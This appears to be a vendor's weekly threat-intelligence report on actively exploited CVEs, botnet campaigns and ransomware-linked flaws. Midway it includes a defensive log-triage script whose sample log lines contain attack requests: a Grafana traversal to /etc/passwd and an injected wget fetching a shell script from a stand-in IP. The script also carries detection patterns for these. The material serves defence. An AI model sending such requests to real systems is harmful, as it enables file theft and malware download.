Executive Summary
The cybersecurity landscape this week continues to demonstrate high activity across both legacy and newly disclosed vulnerabilities, emphasizing the importance of proactive patching and threat monitoring.
This week, 9 vulnerabilities were added to the CISA Known Exploited Vulnerabilities catalog. These include 4 legacy Microsoft flaws and 1 each from Mozilla, Oracle, Synacor Zimbra, Grafana Labs and the Linux kernel.
Exploitation activity was observed in popular WordPress plugins and Milesight industrial routers. This highlights ongoing targeting of web platforms and IoT infrastructure by threat actors.
Botnet operations continue to surge, with EnemyBot, Sysrv-k, Andoryu, and Androxgh0st exploiting weaknesses in GitLab, cloud gateways, and PHP-based applications. Meanwhile, IoT-focused botnets such as Mirai, Bashlite, Tsunami, and BrickerBot intensified attacks on EirD1000 routers, aiming for persistence and lateral network movement.
Researchers have observed exploitation of Fortra GoAnywhere MFT’s License Servlet by the cybercrime group Storm-1175, which is associated with Medusa ransomware deployment. CrowdStrike further identifies zero-day exploitation of Oracle EBS, reflecting targeted enterprise attacks.
Key points
- 9 new vulnerabilities were added to the CISA Known Exploited Vulnerabilities (KEV) catalog, reflecting recent exploitation activity.
- 3 additional vulnerabilities were confirmed as actively exploited in the wild during the week.
- Cytellite sensor telemetry detected exploit and botnet-driven scanning activity targeting globally exposed assets.
- 2 vulnerabilities were identified as being exploited by active malware campaigns, indicating weaponization by threat actors.
- Multiple PRE-NVD vulnerabilities were observed, suggesting potential exploitation prior to public disclosure.
What are the top trending or critical vulnerabilities observed this week?
Several high-impact vulnerabilities are currently trending across the cybersecurity community, demanding immediate attention and patch prioritization. Monitoring these emerging and widely discussed threats provides valuable insights, enabling organizations to make informed security decisions and strengthen their overall defense posture.
CVE-2025-5947
An Authentication Bypass Vulnerability in the Service Finder Bookings plugin for WordPress (affecting versions up to and including 6.0) allows unauthenticated attackers to log in as any user, including administrators, and gain full control of affected websites. The flaw resides in the service_finder_switch_back() function, which was intended to allow users to revert to previous accounts but lacks proper authentication and authorization checks. Wordfence confirmed active exploitation, with attacks observed immediately after disclosure and more than 13,800 exploit attempts blocked by its firewall between August and October 2025. Detection is difficult because indicators are minimal beyond requests containing the switch_back parameter. Remediation for this vulnerability requires updating immediately to Service Finder Bookings version 6.1, which was patched on July 17, 2025. Administrators should also review access logs carefully for any requests containing the switch_back parameter and monitor for suspicious administrative activity to ensure that no unauthorized access has occurred.
CVE-2025-6388
An Authentication Bypass Vulnerability in the Spirit Framework plugin for WordPress (versions up to and including 1.2.14) allows attackers to gain unauthorized access, take over accounts, and escalate privileges. The flaw resides in the custom_actions() function, which fails to properly validate user identity, enabling unauthenticated attackers to log in as any user, including administrators, through crafted requests that bypass credential checks. The Spirit Framework, developed by Theme Spirit and integrated into the widely used Talemy theme for educational and e-learning platforms, increases the exposure of this flaw across thousands of WordPress installations. Wordfence confirmed active exploitation, with 20 blocked attacks recorded within 24 hours. The vulnerability has been patched in version 1.2.15, which introduces enhanced validation mechanisms and stricter authentication controls to mitigate unauthorized access.
CVE-2025-27915
A Cross-Site Scripting (XSS) Vulnerability was identified in Zimbra Collaboration Suite, impacting versions 9.0, 10.0, and 10.1, which could allow attackers to execute arbitrary code on affected systems. This flaw arises from improper input sanitization in web components, enabling injection of malicious scripts that can compromise user sessions or execute unauthorized actions. Synacor Zimbra addressed the issue in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5, released on January 27, 2025. A proof-of-concept (PoC) was recently released, increasing exploitation risk, and the issue has subsequently been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.
CVE-2025-61882
An Unspecified Vulnerability in Oracle E-Business Suite (EBS), affecting versions 12.2.3 through 12.2.14, was exploited as a zero-day and allows an unauthenticated remote attacker with HTTP access to compromise the Concurrent Processing component integrated with BI Publisher. Successful exploitation results in arbitrary code execution under the EBS application context and can lead to full host compromise when combined with a local privilege escalation. Oracle released an emergency security patch to address the flaw, after which multiple proof-of-concept (PoC) exploits were published by CrowdStrike, WatchTowr Labs, Resecurity, and Rapid7. The vulnerability has since been added to the CISA KEV catalog, underscoring the importance of immediate patch deployment and security hardening for affected systems.
CVE-2021-22555
An Out-of-Bounds Write vulnerability in the Linux kernel’s netfilter implementation (net/netfilter/x_tables.c) allows a local unprivileged user, or a process in a user namespace (enabling container escape), to trigger heap corruption and escalate privileges to root or cause a denial of service. Linux vendors released kernel updates in 2021 to remediate the issue, and Ubuntu published security advisories documenting the flaw and available fixes. Public proof-of-concepts and a detailed Google security research writeup demonstrate practical exploitation and multiple variants (including pipe-primitive and 32-bit→64-bit techniques), with researchers validating exploitability in realistic test scenarios. The vulnerability has been added to the CISA KEV catalog, reinforcing the need to apply vendor kernel updates immediately.
CVE-2021-43226
A Privilege Escalation Vulnerability in Microsoft Windows exists in the Common Log File System (CLFS) driver, a core component that manages system and application log files. When exploited by an attacker with basic local access, the flaw permits bypass of security controls and elevation of privileges, potentially enabling full system compromise when combined with persistence or high-privilege code execution. Microsoft released a security update in 2021 to remediate the issue. A proof-of-concept (PoC) is available, and the vulnerability has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring the need to apply the vendor update and audit affected hosts.
CVE-2023-43261
An Information Disclosure Vulnerability in Milesight industrial cellular routers affecting models UR5X, UR32L, UR32, UR35, and UR41 allows attackers to access sensitive router components via exposed APIs. Although Milesight patched this vulnerability in October 2023 with firmware version 35.3.0.7 and corresponding updates for affected UR-series models, recent observations from SEKOIA indicate that threat actors have actively exploited this flaw to abuse the router’s API for sending malicious SMS messages containing phishing URLs. These smishing campaigns, ongoing since at least February 2022, primarily target Sweden, Italy, and Belgium, using typosquatted domains impersonating government and financial services such as CSAM and eBox. Out of approximately 18,000 internet-accessible routers, 572 remain potentially vulnerable, highlighting how exposed APIs combined with phishing tactics have facilitated targeted attacks across Europe.
CVE-2021-43798
A Path Traversal Vulnerability in Grafana, affecting versions 8.0.0-beta1 through 8.3.0, allows attackers to navigate outside the Grafana installation directory and remotely access restricted system files such as /etc/passwd. Grafana Labs patched the flaw in December 2021, releasing updated versions 8.3.1, 8.2.7, 8.1.8, and 8.0.7. The vulnerability originated in the /public/plugins/<plugin-id> URL path, where improper input sanitization permitted unauthorized file reads on vulnerable systems. Recent observations from GreyNoise researchers reveal a renewed surge of exploitation attempts targeting this legacy flaw, involving 110 unique malicious IPs within a single day. The campaign predominantly targeted the United States, Slovakia, and Taiwan, while Bangladesh served as the primary source of scanning activity. The coordinated use of shared TLS JA3 hashes and User-Agent strings indicates the use of common exploit toolkits, underscoring the continued weaponization of older but critical vulnerabilities in modern attack campaigns. The vulnerability has recently been added to the CISA KEV catalog.
CVE-2013-3918
An Out-of-Bounds Write Vulnerability in Microsoft Windows allows remote attackers to execute arbitrary code through a specially crafted web page exploiting the InformationCardSigninHelper ActiveX control (icardie.dll). The flaw exists due to an out-of-bounds write/integer underflow in the legacy ActiveX component, leading to heap corruption and remote code execution within Internet Explorer. Microsoft addressed this issue in November 2013 through security update MS13-090; however, with Internet Explorer reaching end of life in June 2022, any continued use remains highly insecure. Historically, it has been weaponized in major campaigns such as Aurora, LadyBoyle, Tobfy ransomware, Sunshop, Deputy Dog, and Operation Ephemeral Hydra. Although patched, this legacy flaw has now been added to the CISA KEV catalog, underscoring its continued relevance in post-exploitation and historical threat contexts.
CVE-2011-3402
A Remote Code Execution (RCE) Vulnerability in Microsoft Windows affects the win32k.sys TrueType font parsing engine and allows remote attackers to execute arbitrary code via specially crafted fonts embedded in Word documents or web pages. Exploitation corrupts kernel memory, enabling full system compromise, including backdoor installation, privilege escalation, and persistence. The flaw was actively weaponized in the wild by the Duqu malware family in November 2011, often delivered through drive-by web pages or malicious document attachments. Microsoft released a security bulletin in 2011 to patch the vulnerability, which has now been added to the CISA KEV catalog.
CVE-2010-3765
A Remote Code Execution Vulnerability was identified in multiple Mozilla products, including Firefox, SeaMonkey and Thunderbird, which could trigger memory corruption and allow arbitrary code execution. The flaw occurred when document.write() calls were combined with DOM insertion, affecting functions such as nsCSSFrameConstructor::ContentAppended and appendChild, leading to heap corruption. This vulnerability was actively exploited in the wild in October 2010 by malware families like Belmoo, where malicious JavaScript delivered via crafted web pages downloaded and executed additional payloads on victim systems. Proof-of-concept exploits were published shortly after disclosure, demonstrating the heap corruption and the ability to launch backdoors. Although Mozilla released fixes in 2010 (Firefox 3.6.12, Firefox 3.5.15, Thunderbird 3.1.6, Thunderbird 3.0.10, SeaMonkey 2.0.10) to remediate the issue, the vulnerability has now been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.
CVE-2010-3962
An Uninitialized Memory Corruption vulnerability in Microsoft Internet Explorer (IE 6, 7, and 8) allowed remote attackers to achieve arbitrary code execution via specially crafted web pages and HTML/JavaScript that triggered a use-after-free in IE’s CSS/DOM handling. Microsoft released patches in December 2010 to remediate the flaw, but support for Internet Explorer ended on June 15, 2022, leaving any remaining IE users exposed to unpatched risks. The vulnerability was actively exploited in the wild during November 2010 through drive-by campaigns and exploit kits, public proof-of-concept code appeared shortly after disclosure, and multiple AV/IDS signatures (including Microsoft Defender detections) flagged exploit attempts. The issue has recently been added to the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring continued relevance for legacy systems.
What did Cytellite sensors detect this week?
Cytellite telemetry captured active exploit attempts and mass scanning campaigns against exposed services globally. The data highlights which vulnerabilities are under attack and provides source IPs and payloads to authorized teams for detailed threat analysis and validation.
What botnet activity was observed this week?
Multiple vulnerabilities were actively exploited by botnets, demonstrating automated infection and propagation across vulnerable systems. Analysis of MISP logs identified the top CVEs targeted by botnets, with payloads indicative of botnet activity, such as using wget commands with specific IP addresses, highlighting ongoing automated exploitation campaigns.
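The report names three log-level indicators a defender can hunt for directly: requests carrying the switch_back parameter (CVE-2025-5947), traversal sequences under Grafana's /public/plugins/<plugin-id> path (CVE-2021-43798), and botnet payloads that invoke wget against a raw IP address. The following triage script, added here as an illustration and not taken from the report or from any vendor tooling, tags combined-format access log lines for all three; the log lines, IP addresses and paths in it are constructed samples.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined-format access log line (Apache/nginx style): client IP, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Grafana serves plugin assets under /public/plugins/<plugin-id>/ (CVE-2021-43798).
PLUGIN_PATH_RE = re.compile(r'^/public/plugins/[^/]+/')
# wget/curl followed, within the same shell command, by a raw IPv4 literal: the botnet download pattern.
WGET_IP_RE = re.compile(r'\b(?:wget|curl)\b[^;&|]*?\b(?:\d{1,3}\.){3}\d{1,3}\b')


def classify(target):
    """Return indicator tags for one request target; [] means nothing matched."""
    tags = []
    # Decode twice so double-encoded traversal (%252e%252e) is also seen; for a
    # triage tool the extra false positives are acceptable.
    decoded = unquote(unquote(target))
    parts = urlsplit(decoded)
    params = parse_qs(parts.query, keep_blank_values=True)
    if "switch_back" in params:                       # CVE-2025-5947 indicator
        tags.append("CVE-2025-5947 switch_back")
    if PLUGIN_PATH_RE.match(parts.path) and ".." in parts.path:
        tags.append("CVE-2021-43798 traversal")        # plugin path leaving its directory
    if WGET_IP_RE.search(decoded):
        tags.append("botnet wget/curl to raw IP")
    return tags


def scan(lines):
    """Return (client_ip, raw_target, tags) for every log line that carries an indicator."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue                                   # not a combined-format line
        tags = classify(m["target"])
        if tags:
            hits.append((m["ip"], m["target"], tags))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses), not real telemetry.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Oct/2025:10:01:02 +0000] "GET /wp-admin/?switch_back=1 HTTP/1.1" 302 0',
    '198.51.100.8 - - [10/Oct/2025:10:01:03 +0000] "GET /public/plugins/alertlist/../../../../etc/passwd HTTP/1.1" 200 1234',
    '198.51.100.9 - - [10/Oct/2025:10:01:04 +0000] "GET /public/plugins/alertlist/module.js HTTP/1.1" 200 5678',
    '198.51.100.10 - - [10/Oct/2025:10:01:05 +0000] "GET /cgi-bin/;wget%20http://203.0.113.5/bins.sh HTTP/1.1" 404 0',
    '198.51.100.11 - - [10/Oct/2025:10:01:06 +0000] "GET /index.php?p=home HTTP/1.1" 200 42',
]
```

Running scan(SAMPLE_LOG) flags the first, second and fourth lines and leaves the legitimate plugin asset request and the ordinary page view untouched; on real logs, feed the lines from the web server's access log instead of SAMPLE_LOG.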
Which vulnerabilities were abused by malware this week?
Active malware campaigns exploited specific vulnerabilities to deliver payloads and carry out post-exploitation actions. Each targeted vulnerability is proactively monitored, manually analyzed, and mapped to MITRE ATT&CK tactics and techniques. Insights are derived from the LOVI vulnerability intelligence platform, which aggregates and curates data from multiple sources, OSINT groups, blogs, and data leak sites.
CVE-2025-10035
According to Microsoft, the critical deserialization vulnerability CVE-2025-10035 in Fortra GoAnywhere MFT’s License Servlet has been actively exploited by the cybercrime group Storm-1175, known for deploying Medusa ransomware and targeting public-facing applications for initial access. The flaw allows a threat actor with a validly forged license response signature to deserialize an arbitrary actor-controlled object, potentially resulting in command injection and remote code execution. Exploitation activity by Storm-1175 has persisted for nearly a month, prompting Microsoft to urge immediate upgrading to the latest Fortra-recommended versions. This active threat highlights the ongoing targeting of enterprise managed file transfer solutions by ransomware actors.
CVE-2025-61882
According to CrowdStrike, GRACEFUL SPIDER is likely responsible for the mass exploitation campaign against Oracle EBS, with first known exploitation on August 9, 2025. CrowdStrike assesses with high confidence that one or more actors leveraged the flaw as a zero-day and with moderate confidence that GRACEFUL SPIDER sent Cl0p-branded extortion emails on September 29, 2025. Mandiant (Google Cloud) correlates in-the-wild exploitation to Cl0p around August 2025, aligning with CrowdStrike’s timeline. A subsequent public exploit bundle facilitated wider abuse by Scattered LAPSUS$ / ShinyHunters and other collectives.
Were any PRE-NVD vulnerabilities identified this week?
PRE-NVD vulnerabilities refer to security flaws that are discovered, discussed, or even exploited in the wild before their official inclusion in the National Vulnerability Database (NVD). These early-stage vulnerabilities often emerge through threat actor chatter, exploit proof-of-concepts, and technical disclosures shared across social media platforms and underground forums, signaling potential exploitation risks before public awareness.
Conclusion
The surge in exploit activity across legacy and modern systems highlights how both outdated and newly disclosed vulnerabilities continue to fuel threat actor operations. The active exploitation of web platforms, IoT infrastructure, and enterprise applications demonstrates the evolving sophistication of attack chains. Continuous monitoring, rapid patching, and real-time intelligence remain critical to reducing exposure. Platforms like Loginsoft Vulnerability Intelligence (LOVI) empower organizations to stay ahead of these threats by providing actionable insights into exploited vulnerabilities and emerging attack trends.